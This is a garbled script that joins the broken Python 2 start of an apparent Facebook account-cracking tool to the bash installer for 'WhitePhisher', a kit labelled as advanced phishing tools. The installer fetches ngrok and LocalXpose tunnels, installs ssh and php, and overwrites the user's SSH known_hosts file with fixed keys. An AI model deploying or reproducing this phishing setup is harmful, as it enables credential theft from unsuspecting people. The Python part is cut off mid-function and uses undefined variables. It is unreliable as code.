#!/usr/bin/python2
#coding=utf-8


import os,sys,time,datetime,random,hashlib,re,threading,json,urllib,cookielib,requests,mechanize
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from mechanize import Browser


reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(),max_time=1)
br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16')]


def keluar():
	print "\033[1;96m[!] \x1b[1;91mExit"
	os.sys.exit()


def acak(b):
    w = 'ahtdzjc'
    d = ''
    for i in x:
        d += '!'+w[random.randint(0,len(w)-1)]+i
    return cetak(d)


def cetak(b):
    w = 'ahtdzjc'
    for i in w:
        j = w.index(i)
        x= x.replace('!%s'%i,'\033[%s;1m'%str(31+j))
    x += '\033[0m'
    x = x.replace('!0','\033[0m')
    sys.stdout.write(x+'\n')


def jalan(z):
	for e in z + '\n':
		sys.stdout.write(e)
		sys.stdout.flush()
		time.sleep(00000.1)



back = 0
berhasil = []
cekpoint = []
oks = []
id = []
listgrup = []
vulnot = "\033[31mNot Vuln"
vuln = "\033[32mVuln"

os.system("clear")
print  """

\033[1;97m        ___    ___   _   _ _____ _     
\033[1;92m       / _ \  / _ \ | | | |_   _| | Updated✔ 
\033[1;97m      / /_\ \/ /_\ \| |_| | | | | |    
\033[1;92m      |  _  ||  _  ||  _  | | | | |    
\033[1;97m      | | | || | | || | | |_| |_| |____
\033[1;97m      \_| |_/\_| |_/\_| |_/\___/\_____/
                                                               

"""



jalan("\033[1;96m•◈•   _____ _____  ______ ______ _____ _____ ")
jalan("\033[1;96m•◈•  / ____|  __ \|  ____|  ____|  __ \_   _|")
jalan("\033[1;97m•◈• | (___ | |__) | |__  | |__  | |  | || |  ")
jalan("\033[1;96m•◈•  \___ \|  ___/|  __| |  __| | |  | || |  ")
jalan("\033[1;96m•◈•  ____) | |    | |____| |____| |__| || |_ ")
jalan("\033[1;96m•◈• |_____/|_|    |______|______|_____/_____|")
 

jalan("   \037[1;93m Welcome to Internet Help Zone ")


CorrectUsername = "Internet"
CorrectPassword = "Subescribe"


loop = 'true'
while (loop == 'true'):
    username = raw_input("\033[1;95m[☆] \x1b[1;92mUSER ID \x1b[1;36m>>>> ")
    if (username == CorrectUsername):
    	password = raw_input("\033[1;94m[☆] \x1b[1;37mPASWORD \x1b[1;93m>>>> ")
        if (password == CorrectPassword):
            print "Logged in successfully as " + username
            loop = 'false'
        else:
            print "Wrong Password"
            os.system('xdg-open https://www.youtube.com/channel/UCM4wF_X6IV4SNRumm4N_3IA')
    else:
        print "Wrong Username"
        os.system('xdg-open https://www.youtube.com/channel/UCM4wF_X6IV4SNRumm4N_3IA')

def login():
	os.system('clear')
	try:
		toket = open('login.txt','r')
		menu() 
	except (KeyError,IOError):
		os.system('clear')
		print logo
		print 50*"\033[1;96m▪"
		

banner() {
clear
printf " \e[31;1m ░██╗░░░░░░░██╗██╗░░██╗██╗████████╗███████╗ \e[0m\n"
printf " \e[33;1m ░██║░░██╗░░██║██║░░██║██║╚══██╔══╝██╔════╝ \e[0m\n"
printf " \e[32;1m ░╚██╗████╗██╔╝███████║██║░░░██║░░░█████╗░░ \e[0m\n"
printf " \e[34;1m ░░████╔═████║░██╔══██║██║░░░██║░░░██╔══╝░░ \e[0m\n"
printf " \e[35;1m ░░╚██╔╝░╚██╔╝░██║░░██║██║░░░██║░░░███████╗ \e[0m\n"
printf " \e[35;1m ░░░╚═╝░░░╚═╝░░╚═╝░░╚═╝╚═╝░░░╚═╝░░░╚══════╝ \e[0m\n"
printf " \e[33;1m        ADVSNCE PHISHING TOOLS    \e[0m\n"
printf " \e[31;1m ██████╗░██╗░░██╗██╗░██████╗██╗░░██╗███████╗██████╗░ \e[0m\n"
printf " \e[32;1m ██╔══██╗██║░░██║██║██╔════╝██║░░██║██╔════╝██╔══██╗ \e[0m\n"
printf " \e[33;1m ██████╔╝███████║██║╚█████╗░███████║█████╗░░██████╔╝ \e[0m\n"
printf " \e[35;1m ██╔═══╝░██╔══██║██║░╚═══██╗██╔══██║██╔══╝░░██╔══██╗ \e[0m\n"
printf " \e[36;1m ██║░░░░░██║░░██║██║██████╔╝██║░░██║███████╗██║░░██║ \e[0m\n"
printf " \e[37;1m ╚═╝░░░░░╚═╝░░╚═╝╚═╝╚═════╝░╚═╝░░╚═╝╚══════╝╚═╝░░╚═╝ \e[0m\n"
printf " \n"
printf " \e[92m[\e[37;1m+\e[92m]\e[0m\e[33;1m Tool Created by INTERNET HELP ZONE (SHIHAB)\e[0m\n"
}
banner
printf "\e[0m\n"
printf "\e[0m\e[1;91m [\e[1;97m~\e[1;91m]\e[1;93m Installing Packages ....\e[0m\n"
printf "\e[0m\n"
apt-get update
apt-get upgrade -y
apt-get -y install ssh
apt-get -y install curl
apt-get -y install php
apt-get -y install unzip
apt-get -y install openssh-server
printf "\e[0m\n"
printf "\e[0m\e[1;91m [\e[1;97m~\e[1;91m]\e[1;93m Setting Up Environment ....\e[0m\n"
if [[ -d .htr ]]; then
printf ""
else
mkdir .htr
fi
if [[ -d logs ]]; then
printf ""
else
mkdir logs
fi
if [[ -e Modules.zip ]]; then
unzip -qq Modules.zip
rm Modules.zip
fi
if [[ -e .htr/ngrok ]]; then
printf ""
else
arch=$(uname -a | grep -o 'arm' | head -n1)
arch2=$(uname -a | grep -o 'Android' | head -n1)
if [[ $arch == *'arm'* ]] || [[ $arch2 == *'Android'* ]] ; then
curl -LO https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-arm.zip > /dev/null 2>&1
if [[ -e ngrok-stable-linux-arm.zip ]]; then
unzip ngrok-stable-linux-arm.zip > /dev/null 2>&1
mv ngrok .htr
rm -rf ngrok-stable-linux-arm.zip
chmod +x .htr/ngrok
else
printf "\n \e[1;31m[\e[0m\e[1;77m!\e[0m\e[1;31m]\e[0m\e[1;93m Error \e[1;31m[\e[0m\e[1;77m!\e[0m\e[1;31m]\e[0m\e[1;96m Install Ngrok Manually.\e[0m\n"
exit 1
fi
else
curl -LO https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-386.zip > /dev/null 2>&1 
if [[ -e ngrok-stable-linux-386.zip ]]; then
unzip ngrok-stable-linux-386.zip > /dev/null 2>&1
mv ngrok .htr
rm -rf ngrok-stable-linux-386.zip
chmod +x .htr/ngrok
else
printf "\n \e[1;31m[\e[0m\e[1;77m!\e[0m\e[1;31m]\e[0m\e[1;93m Error \e[1;31m[\e[0m\e[1;77m!\e[0m\e[1;31m]\e[0m\e[1;96m Install Ngrok Manually.\e[0m\n"
exit 1
fi
fi
fi
if [[ -e .htr/loclx ]]; then
printf ""
else
archa=$(uname -a | grep -o 'arm' | head -n1)
arch2a=$(uname -a | grep -o 'Android' | head -n1)
if [[ $archa == *'arm'* ]] || [[ $arch2a == *'Android'* ]] ; then
curl -LO https://lxpdownloads.sgp1.digitaloceanspaces.com/cli/loclx-linux-arm.zip > /dev/null 2>&1
if [[ -e loclx-linux-arm.zip ]]; then
unzip loclx-linux-arm.zip > /dev/null 2>&1
mv loclx .htr
rm -rf loclx-linux-arm.zip
chmod +x .htr/loclx
else
printf "\n \e[1;31m[\e[0m\e[1;77m!\e[0m\e[1;31m]\e[0m\e[1;93m Error \e[1;31m[\e[0m\e[1;77m!\e[0m\e[1;31m]\e[0m\e[1;96m Install LocalXpose Manually.\e[0m\n"
exit 1
fi
else
curl -LO https://lxpdownloads.sgp1.digitaloceanspaces.com/cli/loclx-linux-386.zip > /dev/null 2>&1 
if [[ -e loclx-linux-386.zip ]]; then
unzip loclx-linux-386.zip > /dev/null 2>&1
mv loclx .htr
rm -rf loclx-linux-386.zip
chmod +x .htr/loclx
else
printf "\n \e[1;31m[\e[0m\e[1;77m!\e[0m\e[1;31m]\e[0m\e[1;93m Error \e[1;31m[\e[0m\e[1;77m!\e[0m\e[1;31m]\e[0m\e[1;96m Install LocalXpose Manually.\e[0m\n"
exit 1
fi
fi
fi
if [[ -d ~/.ssh ]]; then
printf ""
else
mkdir ~/.ssh
fi
chmod +x whitephisher
printf "|1|SVjtt9mtL4P/5lsqaielF1pJHvM=|6QmJXxfPd9A5uUaFI1RV2H4brTs= ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC3lJnhW1oCXuAYV9IBdcJA+Vx7AHL5S/ZQvV2fhceOAPgO2kNQZla6xvUwoE4iw8lYu3zoE1KtieCU9yInWOVI6W/wFaT/ETH1tn55T2FVsK/zaxPiHZVJGLPPdEEid0vS2p1JDfc9onZ0pNSHLl1QusIOeMUyZ2bUMMLLgw46KOT9S3s/LmxgoJ3PocVUn5rVXz/Dng7Y8jYNe4IFrZOAUsi7hNBa+OYja6ceefpDvNDEJ1BdhbYfGolBdNA7f+FNl0kfaWru4Cblr843wBe2ckO/sNqgeAMXO/qH+SSgQxUXF2AgAw+TGp3yCIyYoOPvOgvcPsQziJLmDbUuQpnH\n|1|PiraXMKgzzt9DdPRSLAtRvRad0Y=|2W162QXfHJvKKZWIaRyZO6VFWJI= ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC3lJnhW1oCXuAYV9IBdcJA+Vx7AHL5S/ZQvV2fhceOAPgO2kNQZla6xvUwoE4iw8lYu3zoE1KtieCU9yInWOVI6W/wFaT/ETH1tn55T2FVsK/zaxPiHZVJGLPPdEEid0vS2p1JDfc9onZ0pNSHLl1QusIOeMUyZ2bUMMLLgw46KOT9S3s/LmxgoJ3PocVUn5rVXz/Dng7Y8jYNe4IFrZOAUsi7hNBa+OYja6ceefpDvNDEJ1BdhbYfGolBdNA7f+FNl0kfaWru4Cblr843wBe2ckO/sNqgeAMXO/qH+SSgQxUXF2AgAw+TGp3yCIyYoOPvOgvcPsQziJLmDbUuQpnH\n" > ~/.ssh/known_hosts
printf "\e[0m\n"
printf "\e[0m\e[1;91m [\e[1;97m~\e[1;91m]\e[1;93m Installation Completed !! \e[0m\n"
printf "\e[0m\n"
sleep 2
printf "\e[0m\e[1;91m [\e[1;97m~\e[1;91m]\e[1;93m Type \e[1;96mbash whitephisher \e[1;93mto run WHITEPHISHER !! \e[0m\n"
printf "\e[0m\n"
printf "\e[0m\n"
